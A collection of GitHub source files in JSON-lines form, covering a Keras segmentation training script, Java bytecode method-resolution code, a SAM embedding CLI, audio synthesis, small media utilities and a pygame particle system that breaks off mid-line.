\r\n'''+form\r\n self.response.out.write(head+message+end)\r\n\r\napplication = webapp.WSGIApplication(\r\n [('.*', MainPage)\r\n ], \r\n debug=True) \r\n\r\ndef main():\r\n run_wsgi_app(application)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"nirea/collarcmds","sub_path":"webinterface.py","file_name":"webinterface.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"27769601265","text":"\nimport numpy as np\nfrom tensorflow.python.keras.callbacks import ReduceLROnPlateau\n\nimport outher_Value_and_func as dg\nimport os\nnp.random.randint(0 ,25)\nos.environ['SM_FRAMEWORK'] = 'tf.keras'\nfrom keras.optimizers import *\nimport cv2\nfrom datetime import datetime\nfrom os import listdir\nfrom os.path import isfile, join\nimage_dim = (192, 192)\nfrom tensorflow import keras\n\ndef ReadData():\n # ToDo:\n # ReadData\n return images_img,images_mask\ndef converNumpy(list):\n try:\n array = np.zeros((len(list), list[0].shape[0], list[0].shape[1], list[0].shape[2]), dtype=np.float32)\n for i in range(len(list)):\n array[i, :, :, :] = list[i]\n except:\n array = np.zeros((len(list), list[0].shape[0], list[0].shape[1], 1), dtype=np.float32)\n for i in range(len(list)):\n array[i, :, :, 0] = list[i]\n return array\n\n\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import f1_score\n\nfrom sklearn.metrics import jaccard_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import average_precision_score\ndef result_treshold_05_jaccard_score_f1score(sonuc, y_test, pred_test):\n try:\n y_pred = pred_test[:, :, :].ravel()\n y_true = ( y_test[:, :, :].ravel() >= 0.5) * 1\n y_pred_binary = (y_pred >= 0.5) * 1\n # jaccard_score(y_true, y_pred_binary) * 10000 // 1\n\n AP=average_precision_score(y_true, y_pred)* 10000 // 1\n fpr, tpr, thresholds = roc_curve(y_true, y_pred)\n roc_auc = auc(fpr, tpr)\n # for idx in range(70):\n # img=y_test[idx, :, :, 1]\n # if img.sum()>10:\n # print(img.sum())\n # dg.visualize(y_test[idx, :, :, 1], pred_test[idx, :, :, 1])\n # dg.visualize(y_test[4, :, :, 1], pred_test[1, :, :, 1])\n\n f1_s = f1_score(y_true, y_pred_binary) * 10000 // 1\n iou = jaccard_score(y_true, y_pred_binary) * 10000 // 1\n except:\n iou=0\n f1_s=0\n # tn, fp, fn, tp = confusion_matrix(y_true, y_pred_binary).ravel()\n # tpr_sensiti=tp/(tp+fp)*10000//1\n # tnr=tn/(tn+fn)*10000//1\n\n sonuc.append('my_iou_score')\n sonuc.append(str(iou))\n sonuc.append('my_f1-score')\n sonuc.append(str(f1_s))\n sonuc.append('my_roc_auc')\n sonuc.append(str(roc_auc))\n sonuc.append('AP_'+str(AP))\n\n return sonuc\n\ndef GetModel(input_shape, classes, activation):\n\n import Inc_ZOEA as rn\n model = rn.Inc_ZOEA_MODEL(input_shape=(input_shape),\n classes=classes, activation=activation, type='DSEB_5x5_mout')\n\n modelName = 'Inc_ZOEA'\n\n\n\n return model, modelName\n\n\nbatch_size = 8\nDataset = 'DAGM_class_your_123456'\nnames = []\nfor i in [1, 2, 3, 4, 5, 6]:\n names.append('Class' + str(i))\n# names = []\n# for i in [1]:\n# names.append('Class' + str(i))\nimages_img, images_mask= ReadData()\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(images_img,\n images_mask,\n test_size=0.25,\n random_state=20)\n\n\n\nprint('+++++++++++++++++++++++++++++++++++++++++++++++++')\nprint('X_train Shape=', X_train.shape)\nprint('y_train Shape=', y_train.shape)\n\nprint('X_test Shape=', X_test.shape)\nprint('y_test Shape=', y_test.shape)\nprint('+++++++++++++++++++++++++++++++++++++++++++++++++')\n# ]\n\nX_train = X_train.astype(np.float32) / 255\ny_train = y_train.astype(np.float32)\nX_test = X_test.astype(np.float32) / 255\ny_test = y_test.astype(np.float32)\nimport segmentation_models as sm\n\n# model_idx_listeeee\n\npred_test_list = []\npred_test_id = []\n# continue\nmodel_idx=15\nkeras.backend.clear_session()\n\nimport tensorflow as tf\n\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\nif y_train.shape[-1]==1:\n classes = 1\n activation='sigmoid'\nelse:\n classes = 2\n activation='softmax'\n\nimg_row, img_colum, img_channels = X_train.shape[1], X_train.shape[2], X_train.shape[3]\ninput_shape = (img_row, img_colum, img_channels)\n\nmodel = None\n# tf.tpu.experimental.initialize_tpu_system(tpu)\nkeras.backend.clear_session()\ntf.keras.backend.clear_session()\n\n\nmodel, modelName = GetModel(input_shape, classes, activation)\nmodel.summary()\n\nlr = 0.0001\n\nprint(\"---------> lr:\", lr)\nmodel.compile(optimizer=Adam(lr=lr), loss=sm.losses.binary_crossentropy,\n metrics=[sm.metrics.iou_score, sm.metrics.f1_score])\n\n\nprint('-----------------------------------------------------------------------------------------------------------------------')\ncallback, logdir=dg.getColback('Dnm_' + modelName +'_' + str(model_idx) + '_' + Dataset, \"./\", model)\n\nprint('tensorboard --logdir=\\''+logdir+'\\'')\n\nnow = datetime.now()\ncurrent_time_bas = now.strftime(\"%d %m %H:%M:%S.%f\")\n\nautoencoder_train = model.fit(X_train, y_train,batch_size=batch_size\n ,epochs=100,verbose=2)\n\nnow = datetime.now()\ncurrent_time_son = now.strftime(\"%H:%M:%S.%f\")\n\nnow = datetime.now()\ncurrent_time_bas_evaluate= now.strftime(\"%H:%M:%S.%f\")\nTestSonuc = model.evaluate(X_test, y_test,\n batch_size=batch_size, verbose=2)\n\nnow = datetime.now()\ncurrent_time_son_evaluate = now.strftime(\"%H:%M:%S.%f\")\n# sonuc=[]\nsonuc=[modelName+'_'+'/'+str(model.optimizer.lr.numpy())]\n\nsonuc.append(Dataset)\npred_test= model.predict(X_test, batch_size=batch_size)\nsonuc = result_treshold_05_jaccard_score_f1score(sonuc, y_test, pred_test)\n\nprint(sonuc)\nprint(sonuc)\n\n\n\n\n\n","repo_name":"mturkoglu23/Inc-ZOEA","sub_path":"model_traning.py","file_name":"model_traning.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33324609974","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom contrib.handlers.message.context_manager._utils import make_prop\n\n\n@dataclass\nclass FakeContext:\n str_data: Optional[str] = None\n integer: Optional[int] = None\n\n\ndef test_make_prop():\n prop = make_prop(FakeContext.str_data, FakeContext, 2)\n assert prop.name == 'str_data'\n assert prop.type == str\n\n prop = make_prop(FakeContext.integer, FakeContext, 2)\n assert prop.name == 'integer'\n assert prop.type == int\n","repo_name":"gakawarstone/gkbot","sub_path":"bot/tests/contrib/test_make_prop.py","file_name":"test_make_prop.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"8755258088","text":"import json\nfrom bson import json_util\nimport pipes\nfrom os import getenv, environ, path\n\ndef init_json_env(env) -> None:\n '''\n init env from json file\n if env not exist, pass it\n '''\n try:\n secrets = path.join(\n path.dirname(path.dirname(__file__)),\n f'config.{env}.json'\n )\n with open(secrets, 'r') as json_file:\n for k, v in json.load(json_file).items():\n k = pipes.quote(k)\n v = pipes.quote(v)\n except FileNotFoundError:\n return None\n \ndef parse_json(data):\n return json.loads(json_util.dumps(data), encoding='utf-8')","repo_name":"dev4hobby/amazon-japan-vinyl-alert","sub_path":"serverless/modules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"21797548315","text":"import cv2\nimport time\n\ncap = cv2.VideoCapture(0)\n\nfor i in range(3, 0, -1):\n\tprint (i)\n\ttime.sleep(1)\n\nret, frame = cap.read()\n\nif ret:\n\tcv2.imwrite(\"myPic.jpg\", frame)\nelse:\n\tprint(\"Failed :(\")\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"berkobob/cv2","sub_path":"takePic.py","file_name":"takePic.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"29118999324","text":"from sython.concurrent import sf_parallel\nfrom com.nerdscentral.audio.core import SFMemoryZone\nfrom sython.utils.Generative import PrimeRange, tweakRandom\nfrom sython.voices.ResonantVoices import make_addtive_resonance\n\ndullRange = PrimeRange(biggerThan = 9, lessThan = 30, divisor = 10.0)\nbrightRange = PrimeRange(biggerThan = 9, lessThan = 120, divisor = 10.0)\n\n@sf_parallel\ndef primeBell(frequency = 440 , brightness = 1.0, length = 10000, hit = 1.0, isBowl = True):\n\n with SFMemoryZone():\n saturate = 0.0\n qCorrect = 3.0\n if frequency > 2000:\n # Ouch.\n frequency *= 0.5\n saturate = 0.1\n qCorrect = 1.0\n\n qc = 1.0 if brightness < 2.0 else 3.0\n harmonics = dullRange if brightness < 2.0 else brightRange\n harmonics = tweakRandom(harmonics(), 0.05)\n\n if isBowl:\n length += 4000 + length\n\n with SFMemoryZone():\n gen = make_addtive_resonance(\n qCorrect = qCorrect,\n post = None,\n rollOff = 3.0,\n power = brightness,\n harmonics = harmonics,\n seed = -40,\n saturate = saturate\n )\n sig = gen(length, frequency).keep()\n\n sig = sf.Mix(\n sig,\n sf.RBJLowPass(\n sf.Multiply(\n sf.WhiteNoise(30),\n sf.LinearShape((0, hit/4.0), (30,0))\n ),\n frequency * 4.0,\n 2.0\n )\n )\n\n peak = 2000 if isBowl else 1\n env = sf.LinearShape(\n (0, frequency if isBowl else 18000),\n (peak, 18000 if isBowl else frequency * 4.0),\n (length, frequency)\n )\n res = sf.LinearShape((1, 1.0),(length,3.0 if isBowl else 1.5))\n sig = sf.ShapedRBJLowPass(sig, env, res)\n\n # A mixture of linear and exponential enveloping.\n env = sf.Multiply(\n sf.LinearShape(\n (0, 0),\n (peak, 1),\n (length, 0)),\n sf.ExponentialShape((0, 0), (peak, 0), (length, -30))\n )\n out = sf.FixSize(sf.Multiply(env, sig))\n return out.keep()\n\n","repo_name":"SonicField/SonicFieldRepo","sub_path":"SonicField/src/sython/resonant/Bells.py","file_name":"Bells.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"20877657087","text":"\"\"\"\r\nhttps://stackoverflow.com/questions/64283087/how-would-i-make-this-stream-a-playlist-and-also-not-stop-responding-when-you-hi\r\n\"\"\"\r\n\r\nimport vlc\r\nimport pafy\r\nimport time\r\nfrom tkinter import *\r\n\r\nclass Window(Frame):\r\n def __init__(self, master = None):\r\n \r\n Frame.__init__(self,master)\r\n self.master = master\r\n\r\n self.init_window()\r\n\r\n def init_window(self):\r\n self.master.title('Lofi.Chill')\r\n\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n play_button = Button(self, text = 'play me some lofi', command=self.happy_song)\r\n play_button.place(x=0,y=0)\r\n\r\n quit_button = Button(self, text = 'quit', command=self.client_exit)\r\n quit_button.place(x=200,y=0)\r\n\r\n\r\n def client_exit(self):\r\n exit()\r\n \r\n def happy_song(self):\r\n Stream('https://www.youtube.com/watch?v=XN41UJ7EZ4E&ab_channel=Andrela-Chxn')\r\n\r\nclass Stream:\r\n def __init__(self, url):\r\n self.url = url\r\n\r\n video = pafy.new(url)\r\n best = video.getbestaudio()\r\n playurl = best.url\r\n\r\n instance = vlc.Instance()\r\n player = instance.media_player_new()\r\n media = instance.media_new(playurl)\r\n\r\n media.get_mrl()\r\n\r\n player.set_media(media)\r\n player.play()\r\n \r\n while True:\r\n time.sleep(1)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"400x300\")\r\napp = Window(root)\r\nroot.mainloop() ","repo_name":"kendfss/misc","sub_path":"2020/vlcplaying.py","file_name":"vlcplaying.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1291350229","text":"import re\nfrom templates.psql import *\n\ndef get_lang_sql():\n cur.execute('''SELECT name FROM LANGUAGES''')\n lang = cur.fetchall()\n languages = []\n for i in range (len(lang)):\n languages.append(''.join(lang[i]))\n return languages\n\ndef create_table(table_name, columns):\n columns = re.sub(r\"'|:|{|}\", \"\", str(columns))\n cur.execute(f\"CREATE TABLE IF NOT EXISTS {table_name}({columns})\")\n c.commit()\n","repo_name":"witkiewiczmikolaj/helbreder","sub_path":"core/app/templates/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"24260929359","text":"# Written by Mara Fennema\n#\n# Plots the loss of the LSTM from train.py\n\nimport numpy as np\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\n\n\npath = \"PATH-TO-LOSS-FILE\"\n\nf = open(path, \"r\")\n\ny = []\nif f.mode == 'r':\n f1 = f.readlines()\n\n for line in f1:\n y.append(float(line[:2]))\n\n# Calculate x-axis\nndatapoints = len(y)\nmaxX = 50*ndatapoints\nx = list(range(0, maxX, 50))\n\n# Calculate the trendline of all the datapoints\nz = np.polyfit(x, y, 1)\np = np.poly1d(z)\n\nplt.plot(x, y, label=\"Loss\")\nplt.plot(x, p(x), color=\"r\", linestyle=\"dashed\", label=\"Average\")\nplt.hlines(22.02122688293457, xmin=x[0], xmax=x[-1:], colors=\"m\",linestyles=\"solid\", label=\"Loss of average pitch\")\nplt.title(\"Loss over time\")\nplt.ylabel(\"Loss\")\nplt.xlabel(\"Iterations\")\nplt.legend()\nplt.show()\n","repo_name":"maradf/Pitch-Prediction-And-Pitch-Classification","sub_path":"plotLoss.py","file_name":"plotLoss.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1901076295","text":"import collections\nimport functools\nimport sys\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport seutil as su\n\nfrom teco.data.cg import CallGraph\nfrom teco.data.pesudo_structures import PesudoStructures\nfrom teco.data.structures import (\n ClassStructure,\n Consts,\n FieldStructure,\n Insn,\n MethodStructure,\n)\n\nlogger = su.log.get_logger(__name__)\n\n\nclass ClassResolutionException(Exception):\n pass\n\n\nclass MethodResolutionException(Exception):\n pass\n\n\nclass FieldResolutionException(Exception):\n pass\n\n\nclass RawDataLoader:\n def __init__(self, indexed: bool = False):\n # increase recursion limit to be able to load some crazy code with long BinaryExpr chain\n sys.setrecursionlimit(10000)\n\n self.indexed = indexed\n\n # currently loaded project\n self.loaded_proj_data_dir = None\n\n # project raw data space\n self.classes: List[ClassStructure] = []\n self.methods: List[MethodStructure] = []\n self.fields: List[FieldStructure] = []\n self.cg: CallGraph = None\n\n # persistent JRE data during collection; they always take up the lower indices\n self.classes_jre: List[ClassStructure] = []\n self.methods_jre: List[MethodStructure] = []\n self.fields_jre: List[FieldStructure] = []\n\n # extra raw data space for pesudo structures; they start from a very high index\n self.classes_extra: List[ClassStructure] = PesudoStructures.get_classes()\n self.methods_extra: List[MethodStructure] = PesudoStructures.get_methods()\n self.fields_extra: List[FieldStructure] = PesudoStructures.get_fields()\n\n if self.indexed:\n # class, method, and field indexes\n self.iname2cid: Dict[str, ClassStructure] = {}\n self.cid2namedesc2mid: Dict[int, Dict[str, int]] = collections.defaultdict(\n dict\n )\n self.cid2name2fid: Dict[int, Dict[str, int]] = collections.defaultdict(dict)\n\n def load_jre_data(self, jre_data_dir: Path):\n self.classes_jre = su.io.load(\n jre_data_dir / \"joint.class.json\", clz=List[ClassStructure]\n )\n self.methods_jre = su.io.load(\n jre_data_dir / \"joint.method.json\", clz=List[MethodStructure]\n )\n self.fields_jre = su.io.load(\n jre_data_dir / \"joint.field.json\", clz=List[FieldStructure]\n )\n\n def get_class(self, cid: int) -> ClassStructure:\n if cid >= PesudoStructures.reserved_cid_begin:\n return self.classes_extra[cid - PesudoStructures.reserved_cid_begin]\n else:\n return self.classes[cid]\n\n @property\n def all_classes(self) -> List[ClassStructure]:\n return self.classes + self.classes_extra\n\n def get_method(self, mid: int) -> MethodStructure:\n if mid >= PesudoStructures.reserved_mid_begin:\n return self.methods_extra[mid - PesudoStructures.reserved_mid_begin]\n else:\n return self.methods[mid]\n\n @property\n def all_methods(self) -> List[MethodStructure]:\n return self.methods + self.methods_extra\n\n def get_field(self, fid: int) -> FieldStructure:\n if fid >= PesudoStructures.reserved_fid_begin:\n return self.fields_extra[fid - PesudoStructures.reserved_fid_begin]\n else:\n return self.fields[fid]\n\n @property\n def all_fields(self) -> List[FieldStructure]:\n return self.fields + self.fields_extra\n\n def load_project_data(self, proj_data_dir: Path) -> bool:\n if self.loaded_proj_data_dir == proj_data_dir:\n return False\n\n self.classes.clear()\n self.classes += self.classes_jre\n self.methods.clear()\n self.methods += self.methods_jre\n self.fields.clear()\n self.fields += self.fields_jre\n\n # load project data\n self.classes += su.io.load(\n proj_data_dir / \"joint.class.json\", clz=List[ClassStructure]\n )\n if len(self.classes) >= PesudoStructures.reserved_cid_begin:\n raise RuntimeError(f\"Too many classes: {len(self.classes)}\")\n self.methods += su.io.load(\n proj_data_dir / \"joint.method.json\", clz=List[MethodStructure]\n )\n if len(self.methods) >= PesudoStructures.reserved_mid_begin:\n raise RuntimeError(f\"Too many methods: {len(self.methods)}\")\n self.fields += su.io.load(\n proj_data_dir / \"joint.field.json\", clz=List[FieldStructure]\n )\n if len(self.fields) >= PesudoStructures.reserved_fid_begin:\n raise RuntimeError(f\"Too many fields: {len(self.fields)}\")\n\n self.cg = su.io.load(proj_data_dir / \"joint.cg.json\", clz=CallGraph)\n\n if self.indexed:\n # invalid lookup cache\n self.lookup_virtual_method.cache_clear()\n self.lookup_interface_method.cache_clear()\n self.lookup_special_method.cache_clear()\n self.lookup_static_method.cache_clear()\n self.lookup_field.cache_clear()\n\n self.iname2cid = {\n Insn.class_q2iname(cs.name): cs.id for cs in self.all_classes\n }\n self.cid2namedesc2mid = collections.defaultdict(dict)\n self.cid2name2fid = collections.defaultdict(dict)\n for cid in self.iname2cid.values():\n cs = self.get_class(cid)\n for mid in cs.methods:\n self.cid2namedesc2mid[cs.id][self.get_method(mid).namedesc] = mid\n for fid in cs.fields:\n self.cid2name2fid[cs.id][self.get_field(fid).name] = fid\n\n self.loaded_proj_data_dir = proj_data_dir\n return True\n\n def lookup_class(self, name: str) -> int:\n try:\n return self.iname2cid[name]\n except KeyError:\n raise ClassResolutionException(\"ClassNotFoundError\")\n\n def lookup_method(self, cid: int, namedesc: str, op: str) -> int:\n if op == Consts.op_invokevirtual:\n return self.lookup_virtual_method(cid, namedesc)\n elif op == Consts.op_invokespecial:\n return self.lookup_special_method(cid, namedesc)\n elif op == Consts.op_invokestatic:\n return self.lookup_static_method(cid, namedesc)\n elif op == Consts.op_invokeinterface:\n return self.lookup_interface_method(cid, namedesc)\n else:\n raise MethodResolutionException(f\"Unknown op: {op}\")\n\n @functools.lru_cache(maxsize=10240)\n def lookup_virtual_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.3\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. if C is an interface, method resolution throws an IncompatibleClassChangeError.\n if cs.is_interface():\n raise MethodResolutionException(\"IncompatibleClassChangeError\")\n\n # 2. Otherwise, method resolution attempts to locate the referenced method in C and its superclasses:\n\n # 2.1. [IGNORED] If C declares exactly one method with the name specified by the method reference, and the declaration is a signature polymorphic method (§2.9), then method lookup succeeds. All the class names mentioned in the descriptor are resolved (§5.4.3.1).\n\n # 2.2. Otherwise, if C declares a method with the name and descriptor specified by the method reference, method lookup succeeds.\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n\n # 2.3. Otherwise, if C has a superclass, step 2 of method resolution is recursively invoked on the direct superclass of C\n if mid < 0:\n super_cid = cs.ext\n while super_cid > 0:\n super_cs = self.get_class(super_cid)\n mid = self.cid2namedesc2mid.get(super_cid, {}).get(namedesc, -2)\n if mid >= 0:\n break\n super_cid = super_cs.ext\n\n # 3. Otherwise, method resolution attempts to locate the referenced method in the superinterfaces of the specified class C:\n if mid < 0:\n # 3.1 If the maximally-specific superinterface methods of C for the name and descriptor specified by the method reference include exactly one method that does not have its ACC_ABSTRACT flag set, then this method is chosen and method lookup succeeds.\n # 3.2 Otherwise, if any superinterface of C declares a method with the name and descriptor specified by the method reference that has neither its ACC_PRIVATE flag nor its ACC_STATIC flag set, one of these is arbitrarily chosen and method lookup succeeds.\n interface_queue = []\n interface_visited = set()\n potential_mids = []\n\n # perform a breath-first search to find all superinterfaces\n interface_queue += cs.impl\n while len(interface_queue) > 0:\n interface_cid = interface_queue.pop(0)\n if interface_cid in interface_visited or interface_cid < 0:\n continue\n interface_visited.add(interface_cid)\n\n potential_mid = self.cid2namedesc2mid.get(interface_cid, {}).get(\n namedesc, -2\n )\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if potential_ms.is_private() or potential_ms.is_static():\n pass\n if potential_ms.is_abstract():\n potential_mids.append(potential_mid)\n else:\n # found a non-abstract method in the maximally-specific superinterface\n mid = potential_mid\n break\n\n interface_queue += self.get_class(interface_cid).impl\n\n if len(potential_mids) > 0:\n # randomly choose one\n mid = potential_mids[0]\n\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_interface_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.4\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. If C is not an interface, interface method resolution throws an IncompatibleClassChangeError.\n if not cs.is_interface():\n raise MethodResolutionException(\"IncompatibleClassChangeError\")\n\n # 2. Otherwise, if C declares a method with the name and descriptor specified by the interface method reference, method lookup succeeds.\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n\n # 3. Otherwise, if the class Object declares a method with the name and descriptor specified by the interface method reference, which has its ACC_PUBLIC flag set and does not have its ACC_STATIC flag set, method lookup succeeds.\n if mid < 0:\n object_cid = self.iname2cid[\"java/lang/Object\"]\n potential_mid = self.cid2namedesc2mid[object_cid].get(namedesc, -2)\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if not potential_ms.is_static() and potential_ms.is_public():\n mid = potential_mid\n\n # 4. Otherwise, if the maximally-specific superinterface methods (§5.4.3.3) of C for the name and descriptor specified by the method reference include exactly one method that does not have its ACC_ABSTRACT flag set, then this method is chosen and method lookup succeeds.\n # 5. Otherwise, if any superinterface of C declares a method with the name and descriptor specified by the method reference that has neither its ACC_PRIVATE flag nor its ACC_STATIC flag set, one of these is arbitrarily chosen and method lookup succeeds.\n if mid < 0:\n interface_queue = []\n interface_visited = set()\n potential_mids = []\n\n # perform a breath-first search to find all superinterfaces\n interface_queue += cs.impl\n while len(interface_queue) > 0:\n interface_cid = interface_queue.pop(0)\n if interface_cid in interface_visited or interface_cid < 0:\n continue\n interface_visited.add(interface_cid)\n\n potential_mid = self.cid2namedesc2mid.get(interface_cid, {}).get(\n namedesc, -2\n )\n if potential_mid >= 0:\n potential_ms = self.get_method(potential_mid)\n if potential_ms.is_private() or potential_ms.is_static():\n pass\n if potential_ms.is_abstract():\n potential_mids.append(potential_mid)\n else:\n # found a non-abstract method in the maximally-specific superinterface\n mid = potential_mid\n break\n\n interface_queue += self.get_class(interface_cid).impl\n\n if len(potential_mids) > 0:\n # randomly choose one\n mid = potential_mids[0]\n\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_special_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n first try virtual, then try interface\n \"\"\"\n try:\n mid = self.lookup_virtual_method(cid, namedesc)\n except MethodResolutionException:\n mid = self.lookup_interface_method(cid, namedesc)\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_static_method(self, cid: int, namedesc: str) -> int:\n \"\"\"\n find the exact method in cid, no overriding\n \"\"\"\n mid = self.cid2namedesc2mid[cid].get(namedesc, -2)\n if mid < 0:\n raise MethodResolutionException(\"NoSuchMethodError\")\n return mid\n\n @functools.lru_cache(maxsize=10240)\n def lookup_field(self, cid: int, name: str) -> int:\n \"\"\"\n https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf section 5.4.3.2\n \"\"\"\n cs = self.get_class(cid)\n\n # 1. If C declares a field with the name and descriptor specified by the field reference, field lookup succeeds. The declared field is the result of the field lookup.\n fid = self.cid2name2fid[cid].get(name, -2)\n\n # 2. Otherwise, field lookup is applied recursively to the direct superinterfaces of the specified class or interface C.\n if fid < 0:\n for interface_cid in cs.impl:\n if interface_cid < 0:\n continue\n fid = self.cid2name2fid[interface_cid].get(name, -2)\n if fid >= 0:\n break\n\n # 3. Otherwise, if C has a superclass S, field lookup is applied recursively to S.\n if fid < 0:\n super_cid = cs.ext\n if super_cid >= 0:\n fid = self.lookup_field(super_cid, name)\n\n # 4. Otherwise, field lookup fails.\n if fid < 0:\n raise FieldResolutionException(\"NoSuchFieldError\")\n\n return fid\n","repo_name":"EngineeringSoftware/teco","sub_path":"python/teco/data/raw_data_loader.py","file_name":"raw_data_loader.py","file_ext":"py","file_size_in_byte":15227,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"82"} +{"seq_id":"73592436428","text":"import argparse\nimport os\nfrom segment_anything import sam_model_registry, SamPredictor\nfrom logging import getLogger\nfrom libtiff import TIFF\nimport numpy as np\n\nlogger = getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Run model prediction on an image\")\n parser.add_argument(\"--input_data_file\", type=str, help=\"Input file path\",\n default='/data/purple_box/'\n 'FKP4_L57D855P1_topro_purplebox_x200y1400z0530.tif')\n parser.add_argument(\"--output_data_base_name\", type=str,\n help=\"Output file path with base file name with slice number appended at run time\",\n default='/data/purple_box/embedding/slice.npy')\n parser.add_argument(\"--model_file\", type=str, default='/data/model/sam_vit_h_4b8939.pth',\n help=\"path for the model to load for inference\")\n\n args = parser.parse_args()\n input_data_file = args.input_data_file\n output_data_base_name = args.output_data_base_name\n model_file = args.model_file\n\n # load model\n model_type = \"vit_h\"\n sam = sam_model_registry[model_type](checkpoint=model_file)\n sam.to(device='cuda')\n\n # load input tiff image into numpy array in RGB format\n tif = TIFF.open(input_data_file)\n images = []\n for image in tif.iter_images():\n images.append(image)\n\n # generate masks for the entire image\n predictor = SamPredictor(sam)\n output = {}\n slice_no = 0\n for im in images:\n # cast image down from 16 bits to 8 bits\n image = im.astype(\"uint8\")\n # convert image to RGB by replicating each intensity into RGB components added as the third axis\n image_rgb = image[:, :, np.newaxis].repeat(3, axis=2)\n # masks is a list of dicts containing all segmented masks for the image slice\n predictor.set_image(image_rgb)\n image_embedding = predictor.get_image_embedding().cpu().numpy()\n print(f'{slice_no}: {image_embedding.shape}')\n base_name, ext_name = os.path.splitext(output_data_base_name)\n output_file_name = f'{base_name}_{slice_no}{ext_name}'\n np.save(output_file_name, image_embedding)\n slice_no += 1\n","repo_name":"RENCI/sam-serve","sub_path":"src/cli_predict.py","file_name":"cli_predict.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70529358351","text":"import pygame\nimport math\nimport sys\nimport random\n\ndef create_guassian(width, height, sigma=1, color=pygame.Vector3(1, 1, 1)):\n \n surf = pygame.surface.Surface((int(width), int(height))).convert_alpha()\n for y in range(width):\n for x in range(height):\n r2 = (x - width/2)**2 + (y - height/2)**2\n g = math.exp(-0.5*r2/(sigma**2))\n c = color.copy()\n # a = g\n a = g/5\n c *= 255\n \n surf.set_at((x, y), (int(c.x), int(c.y), int(c.z), int(a*255)))\n \n return surf\n\nclass Particle:\n\n def __init__(self, pos, size, lifetime, velocity, surf, parent_system):\n self.pos = pos\n self.lifetime = lifetime\n self.age = 0\n self.size = size\n self.velocity = velocity\n self.parent_system = parent_system\n\n self.surf = surf\n\n # randomize the lifetime and the velocity a bit\n t = random.random()\n self.lifetime = self.lifetime*(1 - t) + t*(self.lifetime + self.lifetime*0.5)\n\n t = random.random()\n self.velocity = self.velocity*(1 - t) + t*(self.velocity + self.velocity*0.1)\n \n def update(self, delta):\n self.pos += delta*self.velocity\n self.age += delta\n if self.age >= self.lifetime:\n self.parent_system.remove_particle(self)\n \n t = self.age/self.lifetime\n self.surf.set_alpha(int(255*(1 - t)))\n\n def draw(self):\n surf = pygame.display.get_surface()\n surf.blit(self.surf, (int(self.pos.x - self.size.x/2), int(self.pos.y - self.size.y/2)))\n\nclass ParticleSystem:\n\n def __init__(self, n, pos, lifetime=1, color=pygame.Vector3(0, 0, 0)):\n self.n = n\n self.e_t = 1/n\n self.t = 0\n self.particles = []\n self.pos = pos\n self.g_surf = create_guassian(50, 50, sigma=6, color=color)\n self.lifetime = lifetime\n\n def emit(self, delta):\n self.t += delta\n \n new_particles = []\n while self.t > self.e_t:\n new_particle = Particle(\n pos=self.pos, \n size=pygame.Vector2(50, 50),\n lifetime=self.lifetime,\n velocity=100*pygame.Vector2(0.3*(random.random() - random.random()), -1).normalize(),\n surf=self.g_surf,\n parent_system=self)\n self.particles.append(new_particle)\n self.t -= self.e_t\n\n \n def update(self, delta):\n self.emit(delta)\n for particle in self.particles:\n particle.update(delta)\n\n def draw(self):\n for particle 